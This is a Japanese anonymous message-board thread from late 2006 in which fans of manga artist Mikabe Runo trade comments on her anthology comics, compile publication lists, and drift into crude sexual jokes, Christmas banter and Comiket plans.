僭越ながらベラーを自認していた自分でもゲー魂はモトねたのゲームを
ひとつもやったことなかったからしばらく買わなかったからな。

ええ今では我が家でプラベビの隣に鎮座ましましてるわけですが

143 :花と名無しさん:2006/12/19(火) 08:10:56 ID:???O
元ネタのゲームどれもやったこと無かったけど迷わずに発売日に買ったぞ。そんなゲーム魂、今はアバチュのアンソロとストプラの間に挟まってます。

144 :花と名無しさん:2006/12/19(火) 08:34:25 ID:???O
そういや、自分はミカベルの四コマを見てifを買ったっけなぁ。
アキラ…可愛いよアキラ…っ!その微妙な半裸(全裸?)も素敵さ…っ!

145 :花と名無しさん:2006/12/19(火) 10:14:14 ID:???0
ツヤツヤなアキラはおなかがちょうねんてんするほど笑った

146 :花と名無しさん:2006/12/19(火) 12:10:30 ID:???0
光栄の封神演義アンソロがミカベルとの出会いだった
最初は絵柄濃いな…とか思ってたし、正直好みじゃなかった



今?既刊は全部持ってるよ!!

147 :花と名無しさん:2006/12/19(火) 15:39:03 ID:???O
>>143
アバチュで思い出した。確かアバチュって正宗さんの中の人が出てたよな。ティーバックか何かで。

148 :花と名無しさん:2006/12/19(火) 18:51:26 ID:???0
ミカベルとの出会いは、案じぇりーくのアンソロジーでした
初期こそキラキラ乙女らしいアンソロジーのシリーズでしたが
押田JO氏、魔神ぐりこ氏、ミカベルの投入辺りからカオスに侵食されるようになりました
数冊、作家単体のコミックスが出ているので
いつかミカベル単体のものも出るんじゃないかなぁと
遙かなる昔に案じぇりーくを見限った今でも希望を捨てておりません

うろ覚えですが
RPG版に出てくるオモロイ外見(ガイコツとピーマンだったか)の敵キャラが
ただギャル風オモロ会話しているだけという四コマのラストでヒロインが
「ビジュアルのオモロさに頼ってオチもヒネリもないなんて
 ゲーム四コマとしちゃ三流だわ!!」
と叫んでいたのに、ミカベルのプロ魂を見た…!!!

149 :花と名無しさん:2006/12/19(火) 19:05:15 ID:???0
本屋に行ったらアンジェリークの4コマ傑作選みたいなのが出てた。
収録されているアンソロ作家が10人で、ミカベル分は20ページちょいなのでおすすめはしないけど。
随分古い作品が収録されてたよ。かなり絵は変わってるけど、変わらず面白かった。

150 :花と名無しさん:2006/12/19(火) 19:12:02 ID:???O
詳細な>>5て出来ないものかね。個人一人の力じゃアンソロ作品一覧は出来ませんぬ

151 :花と名無しさん:2006/12/19(火) 21:27:59 ID:???O
>個人一人の力じゃアンスコ一覧は出来ませんぬ

に見えた

152 :花と名無しさん:2006/12/19(火) 21:34:25 ID:???0
>>151 アン・スコ(アンダー・スコート)チラン?! いやらしい!!

ここでテキストにまとめたら、ミカベルスレ第2保管庫さん辺りに載せてもらえないものかね
テンプレに入れるには数が多いだろうし
ちょっと他力本願過ぎだろうか
アンジェリークのアンソロ、半分くらいなら協力できます

153 :花と名無しさん:2006/12/19(火) 21:57:52 ID:???0
アンジェとか遙かならコーエーの立ち読みサイトで調べられると思う。
ついでにちょっとなら読める。

154 :花と名無しさん:2006/12/20(水) 03:21:23 ID:???0
アンジェなら4コマもショートストーリーも全部持ってるが…
なにするん?具体的には。

155 :花と名無しさん:2006/12/20(水) 03:40:39 ID:???O
とりあえずはミカベル掲載のアンソロ本の書名と枚数のリストかなぁ。

156 :花と名無しさん:2006/12/20(水) 05:39:54 ID:???O
プラベビ、ゲーム魂に未収録のヤツかな?

157 :花と名無しさん:2006/12/20(水) 06:00:13 ID:???0
ミカベルの作品リストだったら、自分が以前ある程度纏めたモノがあるので、
もしよかったら、これをベースに纏めてみない?
ここ暫く更新出来てないので、最近のが抜け落ちてるので、
そこら辺をフォローしてもらえばほぼ完璧なリストにはなると思う。
後は、第2保管庫さんに完成したリストの保管をお願い出来ればいいんだけど。

ちなみにアドはこちら。
ttp://www.geocities.jp/skf_kazu/mikaberu.html

158 :花と名無しさん:2006/12/20(水) 10:23:05 ID:???O
カツ代綺麗だよカツ代…!

159 :花と名無しさん:2006/12/20(水) 12:46:16 ID:???O
可哀想に・・・30分以上経過したから>>158は一生涯カツ代しか愛せない体になってしまった・・・!!

160 :花と名無しさん:2006/12/20(水) 14:21:09 ID:???0
>158
01101011101011101

161 :sage:2006/12/20(水) 20:50:58 ID:hpnctPTuO
超空転神トランセイザーの続きが、見たいです…

162 :花と名無しさん:2006/12/20(水) 22:26:31 ID:???O
続きはWebで!

163 :花と名無しさん:2006/12/20(水) 23:15:03 ID:???0
長いよ!

164 :花と名無しさん:2006/12/20(水) 23:20:55 ID:???0
美羽って名前人気あるんだね。
読みは「みう」が多そうだけど。

165 :花と名無しさん:2006/12/21(木) 00:01:18 ID:???O
何十年前の話?

166 :花と名無しさん:2006/12/21(木) 01:48:33 ID:???O
なんか転がってたんで並べときますね つiii!!!!

167 :花と名無しさん:2006/12/21(木) 02:45:29 ID:???0
美羽さんは時代を先どってたんだよ。
SEKIジャニ無限とか知ってるしね!

168 :花と名無しさん:2006/12/21(木) 02:49:05 ID:???0
ネオロマンス・ミカベルセレクションが出るなら
帯は森川智之さんに書いて貰いたいなあ

169 :花と名無しさん:2006/12/21(木) 10:39:23 ID:???0
>美羽
ビッパーと読んでしまった私はVIPスレに行ったことがありません。

170 :花と名無しさん:2006/12/21(木) 11:12:44 ID:???O
「美羽 みう」でググると、なんだかしょっぱい気持ちになるけれど
「美羽 みわ」でググったら、ちゃんこ鍋のページが最初にくるね

171 :花と名無しさん:2006/12/21(木) 11:55:28 ID:???0
ち○んこがどうしたって?

172 :花と名無しさん:2006/12/21(木) 12:05:32 ID:???O
いやらしければなんでもいいのか!?

173 :花と名無しさん:2006/12/21(木) 12:27:06 ID:???O
『みう』だと苺ましま○が思い浮かんでしまう俺

174 :花と名無しさん:2006/12/21(木) 15:38:19 ID:???O
>>173年齢と見た目と肌の艶と性格さえ気にしなければ同じだろ

175 :花と名無しさん:2006/12/21(木) 16:24:58 ID:???0
>>174
兄さんそれは別人っていうんだよ

176 :花と名無しさん:2006/12/21(木) 19:52:45 ID:???O
ロリコン野郎になんか美羽さんの魅力は分からないんだからね!バカッ!

177 :花と名無しさん:2006/12/21(木) 19:58:25 ID:???O
ショタコン野郎になんか巧美の魅力は分からないんだからね!バカッ!




あれ?

178 :花と名無しさん:2006/12/21(木) 21:11:12 ID:???O
海洋深層水がど〜ぅすぃた

179 :花と名無しさん:2006/12/21(木) 22:05:33 ID:???O
パパからもらった心霊スポット
とっても大事にしてたのに壊れて出ない音がある

180 :花と名無しさん:2006/12/21(木) 23:22:44 ID:???O
844:名無しんぼ@お腹いっぱい :2006/12/21(木) 18:22:20 ID:DgjB3JeK0 [sage]
青葉隼人
有井メメコ
いつきまこと
犬山まさと
ウメイチ
カワタユウコ
スミノヒルネ
銭形たいむ
太平洋海
寺鐘ひびき
野田バルス
はやせれく
双葉はづき
美川べるの
三橋貴志
宗高
望月和臣
森山夏鈴

以下イラストのみ
浅見百合子
結川カズノ

20日発売のペルソナ3アンソロにミカベルキタ━━(゚∀゚)━━ッ!!

181 :花と名無しさん:2006/12/22(金) 01:28:06 ID:???0
アンソロ、4ヶ月に1回くらいの参加でいいからページ多めに読みたいってのは贅沢だろうか

182 :花と名無しさん:2006/12/22(金) 11:31:16 ID:???0
「みう」と言ったら最強の弟子のヒロインが思い浮かぶ

183 :花と名無しさん:2006/12/22(金) 12:21:45 ID:???O
あの人、ものすごく乳首が武器になりそうな程の硬度がありそうだよね。
壁にぶつかったら穴あくぐらいの。

184 :花と名無しさん:2006/12/22(金) 12:27:21 ID:???O
週刊になってから読むのやめたな

185 :花と名無しさん:2006/12/22(金) 16:25:17 ID:???O
乳首かゆい





うま

186 :花と名無しさん:2006/12/22(金) 17:58:02 ID:???0
オクラ食うな

187 :花と名無しさん:2006/12/22(金) 18:25:35 ID:???O
オクラは体に良いんだぞ

188 :花と名無しさん:2006/12/22(金) 18:40:33 ID:???0
いや違う…オクラは本来食べるものだ!!

189 :花と名無しさん:2006/12/22(金) 19:02:28 ID:???0
そんな基本的過ぎる突っ込みをしちゃう子は手術しちゃうぞ

190 :花と名無しさん:2006/12/22(金) 19:33:51 ID:???O
サイレント魔女リティにお願い☆

191 :花と名無しさん:2006/12/23(土) 01:13:31 ID:???0
>>190
ふー、ビックリした。

192 :花と名無しさん:2006/12/23(土) 01:44:24 ID:???0
話豚切り。

<問一>『モチ肌乱舞』を伏字なしで具体的に説明せよ。

193 :花と名無しさん:2006/12/23(土) 01:54:18 ID:???0
身体から肌が剥がれて乱舞する。
感触はしっとりもち肌。

思いついたのはこんな感じ。意味分からん。

194 :花と名無しさん:2006/12/23(土) 02:00:40 ID:???O
「今日のクラブイベントは、力士ナイトォォォォォ!!!」
「限りなく全裸に近い半裸の巨漢達が踊り狂う!!!」

「ああ、安馬関は肌がアレでドレスコードにひっかかるので」

195 :花と名無しさん:2006/12/23(土) 03:05:04 ID:???O
モチロン、モチ肌みかべる1000体が乱れ羽ばたき舞踊る♪

196 :花と名無しさん:2006/12/23(土) 03:42:01 ID:???0
凄いことが起きて相手が死ぬ

197 :花と名無しさん:2006/12/23(土) 07:25:14 ID:???O
次のドラクエのサブタイ

198 :花と名無しさん:2006/12/23(土) 07:35:11 ID:???O
アラジンとモチ肌乱舞

199 :花と名無しさん:2006/12/23(土) 13:47:45 ID:???O
モチ肌乱舞?
ああ、この前、美国社長と美羽さんが踊ってたけど…あれの事?
そういえば、何故か人が一杯倒れてたなぁ……

200 :花と名無しさん:2006/12/23(土) 18:26:05 ID:???O
>>192
奈良づくし

201 :花と名無しさん:2006/12/23(土) 21:59:10 ID:???0
すみません、
ストプラ6巻15ページ1コマ目の美羽さんの股間てどうなってるんですか?
ビキニと尻肉とマ○コの配置がよく分かりません!

202 :チューペット:2006/12/23(土) 22:23:03 ID:???0
後ろの食い込みが激しいので水着からはみ出て垂れた尻肉が見えている。

203 :花と名無しさん:2006/12/23(土) 22:30:54 ID:???0
パラドキシア1巻買ったが、見た目の年齢が下がれば下がるほどエロい感じがするのは気のせいだろうか。
花子さんの股間が気になって気になって・・・・・・・・・。


Q子並にいやらしい思考回路の俺をムチでぶって!

204 :花と名無しさん:2006/12/23(土) 22:45:16 ID:???O
よし!ならばまず、よつんばいになり高々と尻をこちらにだすがいい!!

205 :花と名無しさん:2006/12/23(土) 22:59:50 ID:???O
or2 さあぶって、もっとぶって!罵ればいいじゃない!!

さて、おんもに行くか

206 :花と名無しさん:2006/12/23(土) 23:01:10 ID:???0
野外で…という事ですね

207 :花と名無しさん:2006/12/23(土) 23:47:21 ID:???O
205は全裸に青色発光ダイオードという出立ちで意気揚々と大通りを四つんばいになって進むのでありました。

208 :花と名無しさん:2006/12/24(日) 00:37:02 ID:???O
イルミネーションと張り合うな!

209 :花と名無しさん:2006/12/24(日) 00:43:53 ID:???O
あれ?205の尻に竹の子刺さってねぇ?
ハッ!?もしや…あれは、で、伝説の…っ!?

210 :花と名無しさん:2006/12/24(日) 01:20:23 ID:???0
オズノコ。ドゾー つ△

211 :花と名無しさん:2006/12/24(日) 01:32:17 ID:???O
>>200
奈良づくしとは懐かしいな
あの漫画をちょっとドキドキしながら読んでた
中学時代の俺はどこへ行ったのやら…

212 :花と名無しさん:2006/12/24(日) 01:32:33 ID:???0
>>201-202
膣部分丸出しみたいになってるよね

213 :花と名無しさん:2006/12/24(日) 01:38:18 ID:???O
実際丸出しなんじゃね?
そして文字通り誰もツッコミを入れない

214 :花と名無しさん:2006/12/24(日) 04:46:17 ID:???0
だれがいやらしくうまいことを言えと

215 :花と名無しさん:2006/12/24(日) 10:14:52 ID:???O
いやらしいってレベルじゃねーぞ!

216 :花と名無しさん:2006/12/24(日) 13:52:59 ID:???0
そろそろおんもでやれ

217 :花と名無しさん:2006/12/24(日) 15:32:36 ID:???O
さりげなくネタを振って話題を変えるのが紳士のやり方です。

218 :花と名無しさん:2006/12/24(日) 15:52:26 ID:???0
このスレにどれだけ紳士がいるのかとry

219 :花と名無しさん:2006/12/24(日) 16:24:04 ID:???0
>>203
先生の上に座ってるのもなんか来た

220 :花と名無しさん:2006/12/24(日) 18:11:49 ID:???O
変態という名の紳士…ベラーはみんなクマ吉くんか

221 :花と名無しさん:2006/12/24(日) 20:33:05 ID:???O
今日辺り、ビルの窓でRABUとか描いてあるんだろうか

222 :花と名無しさん:2006/12/24(日) 21:39:39 ID:???O
ベラーならガリレオ大回転出来るはず

223 :花と名無しさん:2006/12/24(日) 22:14:44 ID:???0
24日出勤・25日休みの予定だったけど両日出勤になったぜキャホォオイ!!1!1!!





で、これは何のフラグなの?教えてベラーのみんな

224 :花と名無しさん:2006/12/24(日) 22:18:34 ID:???O
>>223
残念ですが…脂肪フラグです…

>>222
ガリレオ大回転は出来ないが、のびのび妹子シップくらいだったら…

225 :花と名無しさん:2006/12/24(日) 22:27:23 ID:???O
>>222
馬から落ちた時に九割方地面に埋まるくらいしか出来ねーよ

226 :花と名無しさん:2006/12/24(日) 22:29:54 ID:???0
>>222
飛んで来た唇に当たっただけで地面にめり込む事なら出来るぞ。

227 :花と名無しさん:2006/12/24(日) 23:20:13 ID:???O
>223
帰りにコンビニに寄るとイベント発生です。アダルト雑誌コーナーが発生ポイントだから間違わないでね☆

228 :花と名無しさん:2006/12/24(日) 23:39:07 ID:???0
>>223
社内恋愛フラグ

229 :花と名無しさん:2006/12/25(月) 00:58:40 ID:???O
>>223
可愛い同僚がクリスマスパーティーを抜け出してきて、「こんな日まで大変ね」と差し入れを持ってきて

くれるわけねー

230 :花と名無しさん:2006/12/25(月) 01:18:01 ID:???0
フラグといえば変態おっさんに監禁されちゃったりすることをいうのでは?

231 :花と名無しさん:2006/12/25(月) 01:33:52 ID:???O
それはもうワンステージ上のジャンルですな

232 :花と名無しさん:2006/12/25(月) 01:57:02 ID:???0
尻を発見しますた!

http://image.blog.livedoor.jp/news4vip2/imgs/6/c/6c6703e1-s.jpg

ニュー速クオリティより
http://news4vip.livedoor.biz/archives/50417912.html

233 :花と名無しさん:2006/12/25(月) 10:40:35 ID:???0
きめぇwwwwww

234 :花と名無しさん:2006/12/25(月) 12:07:44 ID:???O
うわ━━━!

235 :花と名無しさん:2006/12/25(月) 13:10:58 ID:???0
>>232
主張が激しいなwww

236 :花と名無しさん:2006/12/25(月) 13:27:13 ID:???O
お前ら、次から次へと尻、尻言いおって。


そんなに尻が好きか!

ω

237 :花と名無しさん:2006/12/25(月) 13:37:05 ID:???O
目を覚ませ!そいつは尻じゃ無い!ふぐりだ!!

238 :花と名無しさん:2006/12/25(月) 15:00:33 ID:???O
いやらしければなんでもいいわ。いやらしければそれでいい。

♪ひ〜かり〜に包ま〜れ 無数の尻た〜ちは〜 ま〜よーい〜のない瞳ーで ふぐり〜をみーつーめーて〜る〜

239 :花と名無しさん:2006/12/25(月) 17:13:36 ID:???0
このスレの人たちは良い子じゃないから
サンタさんはきっと来なかったんだろうな。

240 :花と名無しさん:2006/12/25(月) 18:22:25 ID:???O
なっ、何言ってんですか!サンタさん来ましたよ!100人くらい!!

241 :花と名無しさん:2006/12/25(月) 20:02:22 ID:???O
うちにもサンタさん来ましたよ!
朝、目が覚めたら目の前に汚い尻とふぐりがセットでありましたよ!
後ろ尻からふぐりがぷっくらと見え隠れs(ry

242 :花と名無しさん:2006/12/25(月) 20:31:50 ID:???0
>>239
枕元に臓物の入った箱が置いてあったよ!

243 :花と名無しさん:2006/12/25(月) 21:02:36 ID:???O
>>240
恒ちゃん、嘘はいけないよ

244 :花と名無しさん:2006/12/25(月) 22:08:10 ID:???0
ねえねえ、良い子のみんな
クリスマスのお話を邪魔してごめんネ☆

ttp://www.kodansha.co.jp/betsufure/interview/int19.html

>最近、興味ある事や自分の中での変化など、日常のエピソードを教えてください。
>そろそろ、東京へ出ようかと思っとります。その他、通販の家具とか、興味シンシン。


↑ミカベルが、こんなことを2004年に言ってたみたいだけど
まだ北海道にいるんだよネ!?
東京に住んでるミカベルなんてミカベルじゃないもん!><
あと、「東京へ出よう」←ココ注目!
東京へ出るって、物凄くいなか者っぽくてナイスだよネ!
あと、もしかして超既出な話で、自分がうっかりさんだったらゴメンネ(゚v´)彡☆

245 :花と名無しさん:2006/12/25(月) 22:35:31 ID:???O
なんか美羽さんくさい

246 :花と名無しさん:2006/12/25(月) 22:37:43 ID:???0
素手でチューペット1分半〜♪

247 :花と名無しさん:2006/12/25(月) 23:47:22 ID:???O
すごい力持ちで、素手でチューペットを作れるんです♪

248 :花と名無しさん:2006/12/26(火) 02:05:32 ID:???0
>>201を見て遅まきながら俺も言いたい。

同じく6巻20ページ1コマ目の美羽さんのわきの下に水着ないよ?!
アレじゃ即ポロリだよ!うれしくないサービスシーンですk……








i

249 :花と名無しさん:2006/12/26(火) 02:08:22 ID:???0
i←首飛んだ人?

250 :花と名無しさん:2006/12/26(火) 02:22:42 ID:???0
>>244
北海道から東京へ引っ越すミカベルなんて
四捨五入で二十歳な美羽さんくらいありえません

251 :花と名無しさん:2006/12/26(火) 05:17:37 ID:???O
>>244
桐島いつみのギャグ漫画で
「イナカの人ってすぐ東京行くって言うよねー
それ聞くたびに東京のどこ行くの?って思っちゃうーpgr」
な事言ってイナカ者コンプレックスの主人公に嫌われた男を思い出した

252 :花と名無しさん:2006/12/26(火) 08:45:22 ID:???O
>>251
東京出てきて、まったく同じ事言われた田舎娘です。
東京に何しに来たの???田舎の方が住みやすくてよさげじゃねぇ?
とか…。来たくて来たって理由じゃダメなのかYO!!
って感じで切なす。

東京は美尻が多いと聞いたし…。

253 :花と名無しさん:2006/12/26(火) 08:51:25 ID:???O
田舎は物が売ってないからだよ!
欲しい服もフィギュアもなかなか手に入らないんだよ!

by田舎者

254 :花と名無しさん:2006/12/26(火) 09:20:31 ID:???0
でも田舎は…若者が少ないから
アイポッドもDSライトもその辺で平積みして売ってたりするよ

255 :花と名無しさん:2006/12/26(火) 09:52:16 ID:???O
馬鹿!ハードがあってもソフトが無かったら意味neeee!

しかも田舎にはとらのあなもまんだらけも無いしヲタイベントも…
本もゲームもネット通販なんて邪道。

平積みミカベル漫画を直接手にしてこそ至福。




…と東京まで最短三時間(新幹線使用時)掛かる地域住民が通り過ぎますよ。

256 :花と名無しさん:2006/12/26(火) 10:16:41 ID:???O
水がまずいとこに住む気ない

いつでも涌き水ですよ
川の水は透き通ってますよ
天然記念物もいますよ
近くにベラー店員がいる本屋がありますよ

257 :花と名無しさん:2006/12/26(火) 10:49:30 ID:???O
確かに都会の水はまずいな…

しかし満天の星空よりヲタグッズの下で暮らしたい

258 :花と名無しさん:2006/12/26(火) 11:31:26 ID:???O
そうだよなマズイよな。
まぁ、ソコは浄水機つけてるから無問題。

正月は田舎帰るけど、夜行バスだと12時間かかるから何となく憂欝。

ベラー友ともしばしの別れ。

259 :花と名無しさん:2006/12/26(火) 11:45:44 ID:???O
>>258
つ本
つ漫画
つCD
つ妄想

これらを旅路の友にすれば、12時間なんてアッーという間だ。

バス酔いには気をつけろ

260 :花と名無しさん:2006/12/26(火) 12:11:16 ID:???O
>>258
もしかしてキングオブ深夜バス・博多号?

261 :花と名無しさん:2006/12/26(火) 12:43:52 ID:???O
東京愛媛又は高知間もなかなかの長時間ですよ
書き手さんがいるイベントに行きたい…委託は寂しい
でも好きなアーティストが大阪でばっかイベントするから東京でなくてもいいなと揺らいでいる
奇しくも本日はちん●祭りだ

262 :花と名無しさん:2006/12/26(火) 12:59:51 ID:???O
>>259
もちろん持ってゆく!が、漫画は読めん。確実に酔う!
>>260
東京→愛媛。
バスは尻がとてつもなく痛くなる、痺れる、割れそうになる。

263 :花と名無しさん:2006/12/26(火) 13:03:14 ID:???O
>>261
ち●ぽ祭り?

264 :261:2006/12/26(火) 13:49:59 ID:???O
>>263
別名1005本の竿祭り
あわや乳首相撲大会も開催されるところだった

ところで年末のラッシュ時にミカベル本カバー抜きを手にしていると微妙に周りに空間が出来るんじゃない?

265 :花と名無しさん:2006/12/26(火) 17:08:00 ID:???0
それ、閉鎖空間だよ。

266 :花と名無しさん:2006/12/26(火) 17:23:47 ID:???0
隙間があるのに息苦しい何かが生まれそうな空間ですね

267 :花と名無しさん:2006/12/26(火) 17:30:16 ID:???O
>>264
ATフィールドだよ

268 :花と名無しさん:2006/12/26(火) 17:42:00 ID:???O
アブソリュートタクミフィールドか

269 :花と名無しさん:2006/12/26(火) 17:51:17 ID:???0
255が北住まいの場合俺と同郷かもな……

>>264
何か通報されそうだ

270 :花と名無しさん:2006/12/26(火) 19:40:41 ID:???O
abound takumi fieldか

271 :花と名無しさん:2006/12/26(火) 19:55:57 ID:???0
しまった、今年は神社マンクッキー作るの忘れてた!

272 :花と名無しさん:2006/12/26(火) 20:28:55 ID:???O
では神社マン鏡餅を作れ

273 :花と名無しさん:2006/12/26(火) 20:47:52 ID:???0
生八橋マンでもいいよ

274 :花と名無しさん:2006/12/26(火) 22:32:12 ID:???O
京風ならアレだろ、花びら回転餅
甘く味つけた黒い棒をぷにぷにの餅のド真ん中にブスリと挟み込んだアレ

275 :花と名無しさん:2006/12/26(火) 22:46:34 ID:???O
スフ霊にしよーぜ

276 :花と名無しさん:2006/12/26(火) 22:48:47 ID:???0
ハラミ茶漬けで

277 :花と名無しさん:2006/12/26(火) 23:22:14 ID:???0
ひとくちおまん

278 :花と名無しさん:2006/12/27(水) 01:01:22 ID:???O
>>271のレスで、既にクリスマスが終わった事に気がついた

279 :花と名無しさん:2006/12/27(水) 01:11:47 ID:???0
今年のサンタ狩りは盛況だったよ

280 :花と名無しさん:2006/12/27(水) 04:28:14 ID:???0
うちも、クリスマスに
キャミワンピ型サンタ服きた女の子と
フード付き型サンタ服きた女の子がきたよ





脳内に

281 :花と名無しさん:2006/12/27(水) 05:05:26 ID:???0
うちもクリスマスに
フード付き型サンタ服きた人が来たよ。



男だけど

282 :花と名無しさん:2006/12/27(水) 07:03:31 ID:???O
>>281
ピザ屋さんの?

ずわいがにぃー

283 :花と名無しさん:2006/12/27(水) 08:17:15 ID:???O
サンタさん綺麗だよサンタさん…!

284 :花と名無しさん:2006/12/27(水) 09:26:36 ID:???0
美羽さんた

285 :花と名無しさん:2006/12/27(水) 10:40:09 ID:???0
しかもはいてない

286 :花と名無しさん:2006/12/27(水) 11:03:30 ID:???0
>>247
ちょwwwポカフェリwwww

>>284-285
「真冬にそんな格好だとカゼひきますよ」ぐらいしか言われなさそう。

287 :花と名無しさん:2006/12/27(水) 11:27:31 ID:???O
>>286
『サンタの服は なぜ赤い』

288 :花と名無しさん:2006/12/27(水) 12:20:25 ID:???O
しっかし、このスレは定期的にダーク-カオスになるなあ。
ミカベルが見たら何て言うだろう…。という訳で、もっと内容について語ろうぜ!
自分としては、早くセクシャルバイオレット五郎の容態が知りたい。
後、凛ちゃんはもっとセクハラされれば良いと思う。ついでに練司もセクハラされれば良いと思う。

289 :花と名無しさん:2006/12/27(水) 12:22:03 ID:???O
>>287
還暦だからですよね美羽さん

290 :花と名無しさん:2006/12/27(水) 12:49:29 ID:???O
あれ?289が突然、赤いちゃんちゃんこ着てる…

291 :花と名無しさん:2006/12/27(水) 13:08:00 ID:???O
学園パラ読んだよー
みかべるさん男性向けも描けるんだね!
これなら男性読者も大幅増しそう
しかも面白かったし!

いろんな読者層に合わせてギャグを作れるなんてさすが

292 :花と名無しさん:2006/12/27(水) 13:44:17 ID:???0
>>291
少年誌!全年齢向け!!ギャグ漫画!!

293 :花と名無しさん:2006/12/27(水) 17:04:05 ID:???O
ストプラ新刊マダー?

294 :花と名無しさん:2006/12/27(水) 20:34:44 ID:???O
サンタの服はもともと昔は茶色で、コカコーラーのキャラクターになってから、赤い服着てるんだぜ。
いやぁ、ホント赤になって良かったと思わない?
フィギアに着せる時、茶色より赤の方が雪の様に白い肌にも、
夏にこんがり焼きすぎたって設定の肌にもはえるってゆーか(ry

295 :花と名無しさん:2006/12/27(水) 21:20:47 ID:???O
服が赤になった今でも、サンタさんの下着は上下茶色だよ

296 :花と名無しさん:2006/12/27(水) 21:45:35 ID:???0
黒サンタの萌えを語らせてくれ

297 :花と名無しさん:2006/12/27(水) 22:22:15 ID:???O
黒サンタってクリスマス以外はホルモン焼き屋でもやってるのかね
私鉄沿線の駅裏、それも快速すら止まらない駅とかでひっそりさ

298 :花と名無しさん:2006/12/27(水) 22:38:37 ID:???O
屋台の親父がサンタだった衝撃

299 :花と名無しさん:2006/12/27(水) 22:50:53 ID:???0
俺の親父がサンタだった衝撃
違うって信じてたのに・・・

300 :花と名無しさん:2006/12/27(水) 22:53:36 ID:???0
姉の「私、サンタ見たよ」という冗談を信じてサンタ教信者だったあの頃……

301 :花と名無しさん:2006/12/27(水) 22:59:18 ID:???0
>>295
サンタはパンツ履いてないよ
ってじっちゃが言ってた!

302 :花と名無しさん:2006/12/27(水) 23:08:39 ID:???0
お前ら正宗祭に行くのか?行くのならちと股間にてじなーにゃ弾を装填しなければ。

303 :花と名無しさん:2006/12/27(水) 23:17:40 ID:???0
>>294

>しかしながら、コカコーラ社が宣伝に起用した1931年より15年以上前の大正3年(1914年)には、
>日本の『子供之友』に赤い帽子に白い髭、白い縁取りのある赤い服を着た、
>現代とまったく違いのない大人の背丈のサンタクロースの姿が描かれており、
>また、この時代の日本で作られていた輸出用(当時、日本は世界一のクリスマス用品生産国であった)の
>サンタクロース人形はこの姿でもあり、「コカコーラ社を起源とする逸話」は、
>完全な間違いである (出典:『クリスマス〜どうやって日本に定着したか』角川書店)。

というわけで>>294、ダウトなんだぜ。

304 :花と名無しさん:2006/12/27(水) 23:54:13 ID:???0
ありえないんだぜ

305 :花と名無しさん:2006/12/28(木) 00:17:02 ID:???O
もうすぐ大晦日なんだぜ

306 :花と名無しさん:2006/12/28(木) 01:07:38 ID:???0
お前はもう…オシャレじゃない…!

307 :花と名無しさん:2006/12/28(木) 01:20:45 ID:???O
>>303
民明書房だと思い
半分スルーして読んでたんだぜ

308 :花と名無しさん:2006/12/28(木) 03:05:24 ID:???0
>307
民明書房っぽいけど
ちゃんとウィキに書いてあったことなんだぜ

つーかウィキは見始めると止まんねえんだぜ

309 :花と名無しさん:2006/12/28(木) 03:07:58 ID:???0
民明書房「俺がサンタで サンタが俺で」

310 :花と名無しさん:2006/12/28(木) 03:17:22 ID:???O
俺「サ、サンタの体ってどうなってるのかな…」
サンタ「私の体を変な事に使わないでー」

311 :花と名無しさん:2006/12/28(木) 10:24:09 ID:???O
>>302
おう、行くぜ。
今からドキドキワクワクだよ!
…なんでミカベル本って増えないんだろうな…。


312 :花と名無しさん:2006/12/28(木) 10:48:17 ID:???O
あってもホモ本くらいか
まあ末期のオタクだから気にしないけどね!

313 :花と名無しさん:2006/12/28(木) 12:22:01 ID:???O
>>302
行きたいが仕事があって行けない…orz

314 :花と名無しさん:2006/12/28(木) 12:46:39 ID:???0
>>302
一日目と三日目に行くけど、まだサークルチェック終ってないぜー。

315 :花と名無しさん:2006/12/28(木) 17:09:40 ID:???O
カタログチェックに夢中で
睡眠不足にならないように気をつけるんだぜ。

あとやはりちゃんと食べて眠ってると
体力消耗しても回復が早いんだぜ

316 :花と名無しさん:2006/12/28(木) 18:50:08 ID:???0
ゲイリーさーん見てる〜??
RABU

317 :花と名無しさん:2006/12/28(木) 23:47:06 ID:???O
明日始発で行くけど未だにカタログ開いてさえいないんだぜ

318 :花と名無しさん:2006/12/29(金) 00:19:23 ID:???O
田舎者には関係ない流れなんだぜ。


319 :花と名無しさん:2006/12/29(金) 00:50:19 ID:???O
この前飲み会をやったら男は全員ストプラを知ってて女は誰一人名前さえ知らないっていう素敵状況が起こったんだぜ
日頃一切オタ臭くない集まりだったからなおのことビックリだぜ

320 :花と名無しさん:2006/12/29(金) 01:02:25 ID:???O
>>319
男全員にフラグが立った!

321 :花と名無しさん:2006/12/29(金) 01:17:11 ID:???O
いやらしいフラグですか?

322 :花と名無しさん:2006/12/29(金) 01:50:30 ID:???O
すげえ、ハーレムエンドルートだ
最後の選択肢間違えんなよ?

323 :花と名無しさん:2006/12/29(金) 03:10:58 ID:???0
319が女とは限らないんだぜ

324 :花と名無しさん:2006/12/29(金) 03:18:35 ID:???0
それはそれでフラグ

325 :花と名無しさん:2006/12/29(金) 03:28:15 ID:???O
何両編成の連結が見られるかな?

326 :花と名無しさん:2006/12/29(金) 09:16:20 ID:???O
>>323
普通に男だと思っていたんだぜ

327 :花と名無しさん:2006/12/29(金) 10:29:44 ID:???0
いやらしければどっちでもいいわ!

328 :花と名無しさん:2006/12/29(金) 17:36:43 ID:???O
あゝ素晴らしきジェンダーフリー

329 :花と名無しさん:2006/12/29(金) 20:14:05 ID:F6eV5I9JO
いやらしさがなくなれば、愛もなくなるんだぜ。

330 :花と名無しさん:2006/12/29(金) 21:20:29 ID:???0
そんな汚れた愛などいらん!

331 :花と名無しさん:2006/12/29(金) 23:17:54 ID:???O
いやらしさの何処が汚れているの!?

332 :花と名無しさん:2006/12/29(金) 23:55:11 ID:???0
>>330
もうワンステージ上のジャンルにくるんだ
素敵な世界が広がってるよ

62 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)